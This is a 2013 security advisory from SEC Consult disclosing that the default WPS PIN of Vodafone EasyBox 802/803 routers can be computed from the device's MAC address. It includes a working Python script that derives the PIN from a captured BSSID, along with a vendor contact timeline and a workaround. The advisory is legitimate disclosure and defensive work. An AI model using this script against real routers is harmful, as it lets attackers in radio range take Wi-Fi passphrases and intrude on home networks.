SEC Consult Vulnerability Lab Security Advisory < 20130805-0 > ======================================================================= title: Vodafone EasyBox Default WPS PIN Algorithm Weakness product: EasyBox 802 & EasyBox 803 vulnerable version: EasyBox 802 - all versions EasyBox 803 - Production date before August 2011 fixed version: EasyBox 802 - no vendor patch available EasyBox 803 - Production date after August 2011 impact: Critical homepage: http://www.vodafone.de found: 2012-12-01 by: Stefan Viehböck SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor/product description: ----------------------------- These DSL home gateways are manufactured by Arcadyan/Astoria Networks and are rebranded for Vodafone Germany. A Wi-Fi AP is enabled by default and can be accessed with the default WPS PIN (PIN External Registrar) printed on the back of the device. Vulnerability overview/description: ----------------------------------- The algorithm that generates the default WPS-PIN is entirely based on the MAC address (=BSSID) and serial number of the device. The serial number can be derived from the MAC address. An unauthenticated attacker within the range of the access point can capture the BSSID (eg. from 802.11 Beacon Frames) and calculate the default WPS PIN for it. This PIN can then be used to retrieve the current access point configuration (including the WPA passphrase) or to change the configuration (SSID, encryption method, passphrase, ...) of the access point. An attacker can afterwards connect to the access point and perform malicious activities such as Man-in-the-middle attacks using ARP spoofing, attack clients on the internal network, etc. Proof of concept: ----------------- A script that implements the derivation algorithm has been developed: #!/usr/bin/env python import sys, re def gen_pin (mac_str, sn): mac_int = [int(x, 16) for x in mac_str] sn_int = [0]*5+[int(x) for x in sn[5:]] hpin = [0] * 7 k1 = (sn_int[6] + sn_int[7] + mac_int[10] + mac_int[11]) & 0xF k2 = (sn_int[8] + sn_int[9] + mac_int[8] + mac_int[9]) & 0xF hpin[0] = k1 ^ sn_int[9]; hpin[1] = k1 ^ sn_int[8]; hpin[2] = k2 ^ mac_int[9]; hpin[3] = k2 ^ mac_int[10]; hpin[4] = mac_int[10] ^ sn_int[9]; hpin[5] = mac_int[11] ^ sn_int[8]; hpin[6] = k1 ^ sn_int[7]; pin = int('%1X%1X%1X%1X%1X%1X%1X' % (hpin[0], hpin[1], hpin[2], hpin[3], hpin[4], hpin[5], hpin[6]), 16) % 10000000 # WPS PIN Checksum - for more information see hostapd/wpa_supplicant source (wps_pin_checksum) or # http://download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc accum = 0 t = pin while (t): accum += 3 * (t % 10) t /= 10 accum += t % 10 t /= 10 return '%i%i' % (pin, (10 - accum % 10) % 10) def main(): if len(sys.argv) != 2: sys.exit('usage: easybox_wps.py [BSSID]\n eg. easybox_wps.py 38:22:9D:11:22:33\n') mac_str = re.sub(r'[^a-fA-F0-9]', '', sys.argv[1]) if len(mac_str) != 12: sys.exit('check MAC format!\n') sn = 'R----%05i' % int(mac_str[8:12], 16) print 'derived serial number:', sn print 'SSID: Arcor|EasyBox|Vodafone-%c%c%c%c%c%c' % (mac_str[6], mac_str[7], mac_str[8], mac_str[9], sn[5], sn[9]) print 'WPS pin:', gen_pin(mac_str, sn) if __name__ == "__main__": main() Vulnerable / tested versions: ----------------------------- The vulnerability has been verified to exist in EasyBox 802 and EasyBox 803, both produced by Arcadyan/Astoria Networks. Other devices of this vendor (including EasyBox 903) might be affected as well. Vodafone did not provide any information on this. According to Vodafone / CERT-Bund, the following devices are vulnerable: EasyBox 802 - all versions EasyBox 803 - production date before August 2011 Vendor contact timeline: ------------------------ 2012-12-14: Contacting Vodafone via customer support. 2013-01-09: Vodafone refers to datenschutz@vodafone.com. 2013-01-10: Requesting encryption keys. 2013-01-14: Vodafone provides encryption keys. 2013-01-15: Sending advisory and proof of concept exploit via encrypted channel. 2013-01-25: Sending reminder regarding SEC Consult disclosure policy. 2013-01-25: Automatic response: Out of office until 2013-02-24. 2013-01-25: Requesting new contact person from CSIRT-DE@vodafone.com and DU-DE-ZV-MXL-CSIRT-DE@vodafone.com. 2013-01-28: Vodafone acknowledges receipt of advisory. 2013-02-05: Vodafone confirms validity of provided information, gives information about some newer devices which are not affected, mentions that customers have already been notified to change "default passwords" (no details given). 2013-02-21: Requesting information regarding affected products/product versions, clarification regarding "default passwords", URLs/communication channels used for mentioned notifications, ways for identifying vulnerable devices (end users), ... 2013-03-13: Still no response - sending deadline dates 2013-05-29: Contacting German CERT-Bund for further coordination in order to warn end users 2013-08-05: Coordinated release of advisory with German CERT-Bund Solution: --------- Vodafone does not provide a solution for the affected devices. Workaround: ----------- Either change the WPS PIN or disable WPS entirely. SEC Consult could not confirm if WPS actually is disabled (as opposed to just not being advertised), so both changing the PIN and disabling WPS is recommended. Advisory URL: -------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Stefan Viehböck / @2013